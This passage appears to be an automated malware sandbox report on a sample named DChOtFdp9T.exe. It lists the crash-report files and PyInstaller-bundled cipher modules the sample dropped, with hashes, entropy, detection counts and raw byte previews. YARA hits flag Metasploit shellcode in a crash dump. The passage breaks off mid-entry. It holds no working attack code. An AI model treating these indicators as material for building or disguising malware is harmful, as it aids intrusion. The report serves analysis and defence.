                                                                                                                                                                                                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.0.7.9.0.2.4.8.7.2.5.7.5.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.0.7.9.0.2.5.3.5.6.9.4.4.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.8.e.3.0.5.0.c.-.c.c.3.4.-.4.8.6.2.-.b.2.d.e.-.1.e.8.1.9.e.e.8.9.5.e.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.0.5.1.d.4.3.8.-.9.8.6.0.-.4.9.d.b.-.8.b.c.b.-.c.3.9.5.9.7.9.a.1.2.3.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.D.C.h.O.t.F.d.p.9.T...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.f.b.4.-.0.0.0.1.-.0.0.1.4.-.c.9.5.0.-.1.a.1.b.1.c.5.b.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.9.e.7.d.2.4.6.3.c.7.5.8.e.3.0.1.9.7.9.0.9.8.0.5.9.8.6.4.6.e.6.6.0.0.0.0.f.f.f.f.!.0.0.0.0.a.4.9.d.c.5.c.a.5.a.c.1.c.d.8.3.1.1.a.0.4.8.0.4.a.e.d.8.d.5.7.c.5.7.2.9.7.4.a.2.!.D.C.h.O.t.F.d.p.9.T...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.1././.2.6.

                                                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER170.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):8766
                                                                                                                                                                                                                          Entropy (8bit):3.703426300745752
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:192:R6l7wVeJ8286Yttmgmf/hpDP89bOaEfc6m:R6lXJV86Y3mgmf/EOhfQ
                                                                                                                                                                                                                          MD5:E99871680661BCB4B73666B711DA8FD6
                                                                                                                                                                                                                          SHA1:DFC6A9DFF1086C9ED81C9145B25AD1A704032228
                                                                                                                                                                                                                          SHA-256:3AD93BCA776AEC7976D6F4C1A2A0848B43CFD84A409971BAC2B0CCFE701667A7
                                                                                                                                                                                                                          SHA-512:1A5D00C3427048C77BB6F25F0BEEA31BB6D8EF891D092C5CF6B0ACC36E0686918BFC2DDA906F6E61377C79EA7BD7B60EACF39FDC4D47DA3DA4C03F1FBDF72B17
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.0.2.0.<./.P.i.

                                                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER1AF.tmp.xml

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):4687
                                                                                                                                                                                                                          Entropy (8bit):4.496314926271765
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:48:cvIwWl8zsHrJg771I9oDWpW8VYpYm8M4JUlOKF1yq85qMOsAvNAd:uIjfHFI7Ly7VVJ45uHSNAd
                                                                                                                                                                                                                          MD5:CC88D05961D30ECFAEFEC95850525E94
                                                                                                                                                                                                                          SHA1:52BE25E193FA64D00AC22C6C0E76D0370F5E74CC
                                                                                                                                                                                                                          SHA-256:4C3BBD0EDE24750120315B60F12D7550783F263A90ECBEB0C9D843FE7806ABD2
                                                                                                                                                                                                                          SHA-512:A76A9D58A8DA1F46F3B540E1B4186009B4799BCAB54600FCE8B8B49DC14AF590A3FD23D4DB6385C91C041FA7C37DCED23B1CD303EB3CBE60DDE5AC973D0292E8
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="654699" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER84.tmp.dmp

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                          File Type:Mini DuMP crash report, 15 streams, Tue Dec 31 00:37:05 2024, 0x1205a4 type
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):162742
                                                                                                                                                                                                                          Entropy (8bit):1.7381116619544745
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:384:UNVroJXnRUkbHdVipGV/DG+wDGjoHgSePnR528UoZ6KFZ+Lu3mqqqNV3jn0RWNOz:UNNoNnRUkb31UoZxFnNWz
                                                                                                                                                                                                                          MD5:7245E15366A4B20BF7BD83651CF53ED3
                                                                                                                                                                                                                          SHA1:51DE4613598EC82B4C66881CCE77E570966BA8A0
                                                                                                                                                                                                                          SHA-256:3C74FAD919954A6EB0693265118978F4F8863769D39D2904AF93423D00A3B3BE
                                                                                                                                                                                                                          SHA-512:2C391D2F2C69F3B71587658B5CE7903E2A1042FDC1075BCF46E2ED2C6D4113C523450C327949E0A8EB08659E46694543E94F0EC7EABF6776FE2272DB92280B43
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Yara Hits:
                                                                                                                                                                                                                          • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER84.tmp.dmp, Author: unknown
                                                                                                                                                                                                                          • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER84.tmp.dmp, Author: unknown
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:MDMP..a..... ........<sg.........................%..............X............m..........`.......8...........T...........P3..fH..........$/...........1..............................................................................eJ.......1......Lw......................T............<sg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher\_ARC4.pyd

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\DChOtFdp9T.exe
                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):11264
                                                                                                                                                                                                                          Entropy (8bit):4.640339306680604
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:192:dLklddyTHThob0q/tJRrlDfNYSOcqgYCWt:ZgcdZq/JJD6gRWt
                                                                                                                                                                                                                          MD5:BCD8CAAF9342AB891BB1D8DD45EF0098
                                                                                                                                                                                                                          SHA1:EE7760BA0FF2548F25D764F000EFBB1332BE6D3E
                                                                                                                                                                                                                          SHA-256:78725D2F55B7400A3FCAFECD35AF7AEB253FBC0FFCDF1903016EB0AABD1B4E50
                                                                                                                                                                                                                          SHA-512:8B6FB53AECB514769985EBFDAB1B3C739024597D9C35905E04971D5422256546F7F169BF98F9BAF7D9F42A61CFF3EE7A20664989D3000773BF5EDA10CB3A0C24
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                          Joe Sandbox View:
                                                                                                                                                                                                                          • Filename: 3OQL58yflv.exe, Detection: malicious, Browse
                                                                                                                                                                                                                          • Filename: 7zip.exe, Detection: malicious, Browse
                                                                                                                                                                                                                          • Filename: main.exe, Detection: malicious, Browse
                                                                                                                                                                                                                          • Filename: main.exe, Detection: malicious, Browse
                                                                                                                                                                                                                          • Filename: chos.exe, Detection: malicious, Browse
                                                                                                                                                                                                                          • Filename: ihost.exe, Detection: malicious, Browse
                                                                                                                                                                                                                          • Filename: shost.exe, Detection: malicious, Browse
                                                                                                                                                                                                                          • Filename: lz4wnSavmK.exe, Detection: malicious, Browse
                                                                                                                                                                                                                          • Filename: WVuXCNNYG0.exe, Detection: malicious, Browse
                                                                                                                                                                                                                          • Filename: dipwo1iToJ.exe, Detection: malicious, Browse
                                                                                                                                                                                                                          Reputation:moderate, very likely benign file
                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r^J.6?$.6?$.6?$.?G..2?$.dJ%.4?$.}G%.5?$.6?%..?$.dJ!.<?$.dJ .>?$.dJ'.5?$..J,.7?$..J$.7?$..J..7?$..J&.7?$.Rich6?$.........................PE..d...Y..f.........." ................P........................................p............`..........................................'......0(..d....P.......@...............`..(....!...............................!..8............ ...............................text............................... ..`.rdata..Z.... ......................@..@.data...H....0......."..............@....pdata.......@.......$..............@..@.rsrc........P.......(..............@..@.reloc..(....`.......*..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher\_Salsa20.pyd

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\DChOtFdp9T.exe
                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):13824
                                                                                                                                                                                                                          Entropy (8bit):5.0194545642425075
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:192:4t/1nCuqaL0kt7AznuRmceS4lDFhAlcqgcLg:F/k1ACln4lDogcLg
                                                                                                                                                                                                                          MD5:F19CB847E567A31FAB97435536C7B783
                                                                                                                                                                                                                          SHA1:4C8BFE404AF28C1781740E7767619A5E2D2FF2B7
                                                                                                                                                                                                                          SHA-256:1ECE1DC94471D6977DBE2CEEBA3764ADF0625E2203D6257F7C781C619D2A3DAD
                                                                                                                                                                                                                          SHA-512:382DC205F703FC3E1F072F17F58E321E1A65B86BE7D9D6B07F24A02A156308A7FEC9B1A621BA1F3428FD6BB413D14AE9ECB2A2C8DD62A7659776CFFDEBB6374C
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                          Joe Sandbox View:
                                                                                                                                                                                                                          • Filename: 3OQL58yflv.exe, Detection: malicious, Browse
                                                                                                                                                                                                                          • Filename: 7zip.exe, Detection: malicious, Browse
                                                                                                                                                                                                                          • Filename: main.exe, Detection: malicious, Browse
                                                                                                                                                                                                                          • Filename: main.exe, Detection: malicious, Browse
                                                                                                                                                                                                                          • Filename: chos.exe, Detection: malicious, Browse
                                                                                                                                                                                                                          • Filename: ihost.exe, Detection: malicious, Browse
                                                                                                                                                                                                                          • Filename: shost.exe, Detection: malicious, Browse
                                                                                                                                                                                                                          • Filename: lz4wnSavmK.exe, Detection: malicious, Browse
                                                                                                                                                                                                                          • Filename: WVuXCNNYG0.exe, Detection: malicious, Browse
                                                                                                                                                                                                                          • Filename: dipwo1iToJ.exe, Detection: malicious, Browse
                                                                                                                                                                                                                          Reputation:moderate, very likely benign file
                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.:...:...:...3.j.>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...........................PE..d...Z..f.........." ................P.....................................................`..........................................8......H9..d....`.......P..L............p..(....1...............................1..8............0...............................text...h........................... ..`.rdata..r....0......................@..@.data...H....@.......,..............@....pdata..L....P......................@..@.rsrc........`.......2..............@..@.reloc..(....p.......4..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher\_chacha20.pyd

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\DChOtFdp9T.exe
                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):13312
                                                                                                                                                                                                                          Entropy (8bit):5.037456384995606
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:192:st/1nCuqaL0ktPMn1ENe3erKr5br0YbsiDw6a9lkOcqgRGd:p/kpMIodrXbsiDS95gRGd
                                                                                                                                                                                                                          MD5:DC14677EA8A8C933CC41F9CCF2BEDDC1
                                                                                                                                                                                                                          SHA1:A6FB87E8F3540743097A467ABE0723247FDAF469
                                                                                                                                                                                                                          SHA-256:68F081E96AE08617CF111B21EDED35C1774A5EF1223DF9A161C9445A78F25C73
                                                                                                                                                                                                                          SHA-512:3ABA4CFCBBE4B350AB3230D488BD75186427E3AAAF38D19E0E1C7330F16795AD77FB6E26FF39AF29EAF4F5E8C42118CB680F90AFBFCA218AEDA64DC444675BA2
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.:...:...:...3.j.>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...........................PE..d...Z..f.........." ................P.....................................................`......................................... 8.......8..d....`.......P..d............p..(....1...............................1..8............0...............................text............................... ..`.rdata.......0......................@..@.data...H....@.......*..............@....pdata..d....P.......,..............@..@.rsrc........`.......0..............@..@.reloc..(....p.......2..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher\_pkcs1_decode.pyd

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\DChOtFdp9T.exe
                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):14336
                                                                                                                                                                                                                          Entropy (8bit):5.09191874780435
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:192:rMVsiXeqVb0lIb0Pj5Jdfpm68WZDInU282tacqgYLg:rM7ali0Pj5JxCaDuUlgYLg
                                                                                                                                                                                                                          MD5:C09BB8A30F0F733C81C5C5A3DAD8D76D
                                                                                                                                                                                                                          SHA1:46FD3BA87A32D12F4EE14601D1AD73B78EDC81D1
                                                                                                                                                                                                                          SHA-256:8A1B751DB47CE7B1D3BD10BEBFFC7442BE4CFB398E96E3B1FF7FB83C88A8953D
                                                                                                                                                                                                                          SHA-512:691AC74FAE930E9CEABE782567EFB99C50DD9B8AD607DD7F99A5C7DF2FA2BEB7EDFE2EBB7095A72DA0AE24E688FBABD340EAE8B646D5B8C394FEE8DDD5E60D31
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r^:.6?T.6?T.6?T.?G..2?T.dJU.4?T.}GU.5?T.6?U..?T.dJQ.<?T.dJP.>?T.dJW.5?T..J\.7?T..JT.7?T..J..7?T..JV.7?T.Rich6?T.........................PE..d...X..f.........." ................P.....................................................`.........................................`8.......8..d....`.......P..(............p..(....1...............................1..8............0...............................text............................... ..`.rdata..6....0....... ..............@..@.data...x....@......................@....pdata..(....P.......0..............@..@.rsrc........`.......4..............@..@.reloc..(....p.......6..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher\_raw_aes.pyd

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\DChOtFdp9T.exe
                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):36352
                                                                                                                                                                                                                          Entropy (8bit):6.541423493519083
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:384:f/UlZA5PUEllvxL/7v/iKBt5ByU0xGitqzSEkxGG7+tpKHb/LZ7fr52EkifcMxme:klcR7JriEbwDaS4j990th9VDBV
                                                                                                                                                                                                                          MD5:0AB25F99CDAACA6B11F2ECBE8223CAD5
                                                                                                                                                                                                                          SHA1:7A881B3F84EF39D97A31283DE6D7B7AE85C8BAE6
                                                                                                                                                                                                                          SHA-256:6CE8A60D1AB5ADC186E23E3DE864D7ADF6BDD37E3B0C591FA910763C5C26AF60
                                                                                                                                                                                                                          SHA-512:11E89EEF34398DF3B144A0303E08B3A4CAF41A9A8CA618C18135F561731F285F8CF821D81179C2C45F6EEB0E496D9DD3ECF6FF202A3C453C80AFEF8582D06C17
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r^J.6?$.6?$.6?$.?G..2?$.dJ%.4?$.}G%.5?$.6?%..?$.dJ!.<?$.dJ .>?$.dJ'.5?$..J,.7?$..J$.7?$..J..7?$..J&.7?$.Rich6?$.........................PE..d...V..f.........." .....H...H......P.....................................................`.........................................p...........d...............................0......................................8............`...............................text...xG.......H.................. ..`.rdata.."6...`...8...L..............@..@.data...H...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..0...........................@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher\_raw_aesni.pyd

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\DChOtFdp9T.exe
                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):15360
                                                                                                                                                                                                                          Entropy (8bit):5.367749645917753
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:192:YiJBj5fq/Rk0kPLhOZ3UucCWuSKPEkA2bD9JXx03cqg5YUMLgs:/k1kTMZEjCWNaA2DTx0g5YUMLg
                                                                                                                                                                                                                          MD5:B6EA675C3A35CD6400A7ECF2FB9530D1
                                                                                                                                                                                                                          SHA1:0E41751AA48108D7924B0A70A86031DDE799D7D6
                                                                                                                                                                                                                          SHA-256:76EF4C1759B5553550AB652B84F8E158BA8F34F29FD090393815F06A1C1DC59D
                                                                                                                                                                                                                          SHA-512:E31FD33E1ED6D4DA3957320250282CFD9EB3A64F12DE4BD2DFE3410F66725164D96B27CAA34C501D1A535A5A2442D5F070650FD3014B4B92624EE00F1C3F3197
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.:...:...:...3.z.>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...........................PE..d...V..f.........." ......... ......P.....................................................`..........................................9......$:..d....`.......P...............p..(....1...............................1..8............0.. ............................text............................... ..`.rdata.......0......."..............@..@.data...8....@.......2..............@....pdata.......P.......4..............@..@.rsrc........`.......8..............@..@.reloc..(....p.......:..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher\_raw_arc2.pyd

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\DChOtFdp9T.exe
                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):16384
                                                                                                                                                                                                                          Entropy (8bit):5.41148259289073
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:192:w3d9FkHaz0EJvrj+CYuz7ucc9dG7otDr22KcqgOiewZjW:YkHEJzj+X6769lDzagO/w
                                                                                                                                                                                                                          MD5:F14E1AA2590D621BE8C10321B2C43132
                                                                                                                                                                                                                          SHA1:FD84D11619DFFDF82C563E45B48F82099D9E3130
                                                                                                                                                                                                                          SHA-256:FCE70B3DAFB39C6A4DB85D2D662CB9EB9C4861AA648AD7436E7F65663345D177
                                                                                                                                                                                                                          SHA-512:A86B9DF163007277D26F2F732ECAB9DBCA8E860F8B5809784F46702D4CEA198824FDEF6AB98BA7DDC281E8791C10EABA002ABDA6F975323B36D5967E0443C1E4
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.g.:...:...:...3...>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...................PE..d...W..f.........." ....."... ......P.....................................................`.........................................pI.......J..d....p.......`..................(....B...............................B..8............@...............................text...( .......".................. ..`.rdata..<....@.......&..............@..@.data...H....P.......6..............@....pdata.......`.......8..............@..@.rsrc........p.......<..............@..@.reloc..(............>..............@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher\_raw_blowfish.pyd

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\DChOtFdp9T.exe
                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):20992
                                                                                                                                                                                                                          Entropy (8bit):6.041302713678401
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:384:kUX0JfbRz5MLZA0nmwzMDYpJgLa0Mp8NDBcxgprAM:6NbRzWXwDqgLa1uBfP
                                                                                                                                                                                                                          MD5:B127CAE435AEB8A2A37D2A1BC1C27282
                                                                                                                                                                                                                          SHA1:2A7BF8BF7F24B2381370BA6B41FB640EE42BDCCD
                                                                                                                                                                                                                          SHA-256:538B1253B5929254ED92129FA0957DB26CDDF34A8372BA0BF19D20D01549ADA3
                                                                                                                                                                                                                          SHA-512:4FE027E46D5132CA63973C67BD5394F2AC74DD4BBCFE93CB16136FAB4B6BF67BECB5A0D4CA359FF9426DA63CA81F793BBF1B79C8A9D8372C53DCB5796D17367E
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.g.:...:...:...3...>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...................PE..d...W..f.........." .....$...0......P.....................................................`.........................................0Y.......Y..d............p..................0....Q...............................R..8............@...............................text....".......$.................. ..`.rdata.......@... ...(..............@..@.data...H....`.......H..............@....pdata.......p.......J..............@..@.rsrc................N..............@..@.reloc..0............P..............@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher\_raw_cast.pyd

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\DChOtFdp9T.exe
                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):24576
                                                                                                                                                                                                                          Entropy (8bit):6.530656045206549
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:384:cEDwUBi9SPu71omZXmrfXA+UA10ol31tuXVYdAgYj:FsUBXmoEXmrXA+NNxWFYfo
                                                                                                                                                                                                                          MD5:2E15AA6F97ED618A3236CFA920988142
                                                                                                                                                                                                                          SHA1:A9D556D54519D3E91FA19A936ED291A33C0D1141
                                                                                                                                                                                                                          SHA-256:516C5EA47A7B9A166F2226ECBA79075F1A35EFFF14D87E00006B34496173BB78
                                                                                                                                                                                                                          SHA-512:A6C75C4A285753CC94E45500E8DD6B6C7574FB7F610FF65667F1BEC8D8B413FC10514B7D62F196C2B8D017C308C5E19E2AEF918021FA81D0CB3D8CED37D8549A
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.:...:...:...3.j.>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...........................PE..d...W..f.........." .....$...>............................................................`..........................................h.......i..d...............................0....a...............................a..8............@...............................text....#.......$.................. ..`.rdata..:-...@.......(..............@..@.data...H....p.......V..............@....pdata...............X..............@..@.rsrc................\..............@..@.reloc..0............^..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher\_raw_cbc.pyd

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\DChOtFdp9T.exe
                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):12288
                                                                                                                                                                                                                          Entropy (8bit):4.7080156150187396
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:192:lF/1n7Guqaj0ktfEJwX1fYwCODR3lncqg0Gd6l:RGXkJEm1feODxDg0Gd6
                                                                                                                                                                                                                          MD5:40390F2113DC2A9D6CFAE7127F6BA329
                                                                                                                                                                                                                          SHA1:9C886C33A20B3F76B37AA9B10A6954F3C8981772
